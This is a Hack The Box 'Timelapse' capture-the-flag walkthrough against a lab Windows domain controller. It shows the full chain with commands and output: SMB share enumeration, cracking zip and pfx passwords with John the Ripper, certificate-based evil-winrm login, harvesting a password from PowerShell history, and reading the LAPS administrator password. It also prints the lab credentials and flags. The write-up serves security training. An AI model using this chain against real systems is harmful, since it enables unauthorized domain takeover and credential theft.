Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
Timelapse – Hack The Box
Abusing LAPS Privileges
Task 1 – What is the common name on TLS/SSL certificate returned from one of the open TCP ports on Timelapse?
I started by a nmap scan:
kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC -sT 10.129.227.113
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-02-20 13:26 CET
Nmap scan report for 10.129.227.113
Host is up (0.056s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-20 20:27:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2026-02-20T20:28:55+00:00; +7h59m56s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m55s, deviation: 0s, median: 7h59m55s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-02-20T20:28:15
|_ start_date: N/A
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 135.00 seconds
The comon name on TLS/SSL certificate returned is dc01.timelapse.htb, which suggests this machine is a DC and the domain is timelapse.htb
Task 2 – What TCP port is SMB running on?
SMB is running on port 445
Task 3 – What tool from the John The Ripper tool suite can be used to generate a hash that can be used by John The Ripper from a password-protected zip file to a format ?
The tool is zip2john
Task 4 – What tool from the John The Ripper tool suite can be used to generate a hash that can be used by John The Ripper from a pfx file?
I didn;t know what pfx is, so I started by a small research.
A Personal Information Exchange (.pfx) Files, is password protected file certificate commonly used for code signing your application. It derives from the PKCS 12 archive file format certificate, and it stores multiple cryptographic objects within a single file:
- X.509 public key certificates
- X.509 private keys
- X.509 CRLs
- generic data
There are other types of certificate formats such as .pem, .cert, .crt and some of them can even be converted to a .pfx and used for code signing, while others can only be used for SSL (web pages).
The tool is pfx2john
Task 5 – What is the default port for the Windows Remote Management or WinRM service over HTTP (not HTTPS)?
The default port for the Windows Remote Management on WinRM service over HTTP is 5985
Task 6 – Using Evil-WinRM, the -c flag will allow the user to provide a certificate. What flag can be used to provide a private key?
Looking at evilWinRM manual, we can find that -k is used to provide a private key
Task 7 – User
Having answered all the questions, my attack path is to try to connect anonymously on port 445 and find a certificate to use it using EvilWinRM but there is a cracking somewhere but still i don’t know where
I started enumerating shares using smbclient:
─(kali㉿kali)-[~/Desktop]
└─$ smbclient -L //10.129.227.113
Password for [WORKGROUP\\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
I then connected to “Shares” and found 2 folders:
──(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.129.227.113/Shares
Password for [WORKGROUP\\kali]:
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
6367231 blocks of size 4096. 1335382 blocks available
smb: \\>
Inside Dev, we find a zip file winrm_backup.zip. Let’s try to crack it
──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ zip2john winrm_backup.zip > ziphash.txt
Created directory: /home/kali/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2026-02-20 15:06) 3.333g/s 11578Kp/s 11578Kc/s 11578KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The password is supremelegacy
─(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ john --show ziphash.txt
winrm_backup.zip/legacyy_dev_auth.pfx:supremelegacy:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip
1 password hash cracked, 0 left
Unzipping using the found password, we get a pfx file. Let’s try to crack it:
(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ pfx2john legacyy_dev_auth.pfx > pfxhash.txt
┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt pfxhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 SSE2 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:13 DONE (2026-02-20 15:11) 0.01367g/s 44190p/s 44190c/s 44190C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ john --show pfxhash.txt
legacyy_dev_auth.pfx:thuglegacy:::::legacyy_dev_auth.pfx
1 password hash cracked, 0 left
The password found is thuglegacy
Let’s extract the private key:
(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out key.pem
Let’s extract the Certificate:
─(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem
Now we still need a username. Let’s read the contents of the certificate:
─(kali㉿kali)-[~/Desktop/Timelapse/Dev]
└─$ openssl x509 -in cert.pem -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
1d:99:89:29:8a:cf:11:bb:41:93:a1:cf:f4:4e:12:df
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=Legacyy
Validity
Not Before: Oct 25 14:05:52 2021 GMT
Not After : Oct 25 14:15:52 2031 GMT
Subject: CN=Legacyy
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:a5:56:07:a3:62:16:47:1e:e2:f3:4d:23:ad:61:
71:ce:8b:9e:b3:4a:87:2b:f6:89:bc:e7:86:03:bb:
fe:aa:1c:16:b8:35:ff:31:14:fe:88:34:d0:4d:95:
85:af:03:10:af:28:cf:1a:42:c1:e9:bf:7b:68:a7:
0a:50:f9:86:d1:64:3b:b5:37:1c:a1:bd:f3:4d:4d:
15:e3:74:54:15:f6:72:22:2a:4a:30:3a:de:a0:1b:
61:7e:f4:ee:60:54:5e:0f:02:71:cf:9b:e6:18:3f:
0b:1b:a1:19:18:57:c4:0e:a7:32:22:e8:d3:19:80:
30:89:ae:02:12:59:99:94:1e:a4:e1:c9:b1:56:ff:
b3:ce:99:ed:60:b3:ab:62:37:55:c5:a0:fb:b5:cc:
d3:98:68:82:f7:76:d6:5a:6b:35:dc:2f:0e:88:a5:
32:51:3c:90:16:1a:db:6a:c8:5a:26:99:8a:c9:a8:
2c:c2:49:a5:ae:f6:31:b4:a7:58:4a:2b:b9:a4:eb:
0b:c1:49:1f:10:7c:75:b6:a9:7f:7e:35:b2:ca:7a:
00:ad:fb:f8:c0:6b:ab:b6:57:d9:6e:f8:ad:cc:0b:
63:5a:4b:33:a8:22:2e:47:2c:c8:e7:ae:e8:d1:a0:
2c:77:bf:a6:57:2f:42:8f:08:5c:c3:30:4a:8b:14:
91:f1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Client Authentication
X509v3 Subject Alternative Name:
othername: UPN:[email protected]
X509v3 Subject Key Identifier:
CC:D9:0E:E4:AF:20:9E:B0:75:2B:FD:81:96:1E:AC:2D:B1:25:58:19
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
5f:8e:fb:76:bf:de:3e:fe:96:fd:da:72:c8:4b:8a:e7:6b:b0:
88:2a:ba:9a:9b:de:ba:1f:c9:05:ea:de:e9:1d:93:e5:10:36:
4c:af:5e:ee:e7:49:2f:4c:dd:43:e0:fb:65:0a:e7:7d:49:a3:
ec:a2:44:9b:28:da:05:81:7d:4a:35:7e:66:ef:61:74:dc:a0:
8b:22:68:75:cf:89:6d:c6:c7:3a:26:03:a0:9d:c0:aa:74:57:
d7:de:dd:04:cb:74:7b:28:6c:7a:ad:e2:ed:bd:4e:05:67:e9:
e1:be:55:d3:78:9f:cf:01:77:3f:7f:06:b6:ad:f8:8f:b1:f5:
79:d5:64:ce:60:4c:dc:82:99:e0:74:72:6d:06:a9:ae:37:0d:
ed:9c:42:a6:80:ca:a9:eb:92:98:ce:92:93:be:f3:35:26:38:
48:e6:dc:46:86:a6:dd:59:b9:f6:95:2e:30:8c:6c:b7:60:64:
59:c3:aa:0c:eb:ae:c6:17:5d:d5:ab:65:f7:58:76:4a:e4:d6:
8f:fb:92:9a:c1:df:c9:f8:cb:3a:ae:26:34:3c:36:e1:9f:1d:
78:de:f2:22:a0:76:0c:88:60:a7:2a:c1:dd:5a:23:2b:1b:65:
16:2c:ea:1e:52:b9:54:9a:9a:f4:eb:d9:18:fe:79:fb:fb:34:
84:6b:6a:40
We find the user [email protected]. Let’s try to log in with what we have till now
┌──(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ evil-winrm -S -i 10.129.227.113 -u legacyy -c cert.pem -k key.pem
Task 7 – The flag
The flag is 28a1e8c0bcdf0648da478ac0dc62f5d2
Task 8 – What is the full path used to read PowerShell history file, starting from $env:?
I tried first to enumerate the environment variables:
*Evil-WinRM* PS C:\\Users\\legacyy\\desktop> Get-ChildItem Env:
Name Value
---- -----
ALLUSERSPROFILE C:\\ProgramData
APPDATA C:\\Users\\legacyy\\AppData\\Roaming
CommonProgramFiles C:\\Program Files\\Common Files
CommonProgramFiles(x86) C:\\Program Files (x86)\\Common Files
CommonProgramW6432 C:\\Program Files\\Common Files
COMPUTERNAME DC01
ComSpec C:\\Windows\\system32\\cmd.exe
DriverData C:\\Windows\\System32\\Drivers\\DriverData
LOCALAPPDATA C:\\Users\\legacyy\\AppData\\Local
NUMBER_OF_PROCESSORS 2
OS Windows_NT
Path C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\Users\\legacyy\\AppData\\Local\\Microsoft\\WindowsApps
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE AMD64
PROCESSOR_IDENTIFIER AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL 25
PROCESSOR_REVISION 0101
ProgramData C:\\ProgramData
ProgramFiles C:\\Program Files
ProgramFiles(x86) C:\\Program Files (x86)
ProgramW6432 C:\\Program Files
PSModulePath C:\\Users\\legacyy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules
PUBLIC C:\\Users\\Public
SystemDrive C:
SystemRoot C:\\Windows
TEMP C:\\Users\\legacyy\\AppData\\Local\\Temp
TMP C:\\Users\\legacyy\\AppData\\Local\\Temp
USERDNSDOMAIN TIMELAPSE.HTB
USERDOMAIN TIMELAPSE
USERNAME legacyy
USERPROFILE C:\\Users\\legacyy
windir C:\\Windows
However the question asked for the default path, after some research I found:
$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
Task 9 – What user’s password can be found in that PowerShell history file?
I then printed the PowerShell history:
*Evil-WinRM* PS C:\\Users\\legacyy\\desktop> cat C:\\Users\\legacyy\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
The user is svc_deploy
Task 10 – What non-standard group is svc_deploy a part of?
We can get the user’s group using the following command:
*Evil-WinRM* PS C:\\Users\\legacyy\\desktop> Get-ADUser svc_deploy -Properties MemberOf | Select-Object -ExpandProperty MemberOf
CN=LAPS_Readers,OU=Groups,OU=Staff,DC=timelapse,DC=htb
CN=Remote Management Users,CN=Builtin,DC=timelapse,DC=htb
He is part of LAPS_readers
Task 11 – What is the acronym LAPS short for?
LAPS is short for Local Administrator Password Solution
Task 12 – What is the name of the property on an active directory computer object that contains the LAPS-generated password for the administrator account?
After some research, I found that the property on active directory object that contains LAPS-generated password of the administrator account is ms-mcs-admpwd
Task 13- Root Flag
First we need to login or runas as the user svc_deploy and then we can enumerate LAPS
We can log in using the password found in PowerShell history:
─(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ evil-winrm -i 10.129.227.113 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
We can get the LAPS password using the following command:
*Evil-WinRM* PS C:\\Users\\svc_deploy\\Documents> Get-ADComputer DC01 -Properties ms-mcs-admpwd | Select-Object Name,ms-mcs-admpwd
Name ms-mcs-admpwd
---- -------------
DC01 63%/G{L-}(hl.@yS1hpX}KLe
The password is the for the local Administrator account on DC01
We can then login using the Administrator credentials:
──(kali㉿kali)-[~/Desktop/Timelapse/Dev/pfx]
└─$ evil-winrm -i 10.129.227.113 -u 'Administrator' -p '63%/G{L-}(hl.@yS1hpX}KLe' -S
The flag is 97d3f7b95fa349b903b7bc38aa595baa
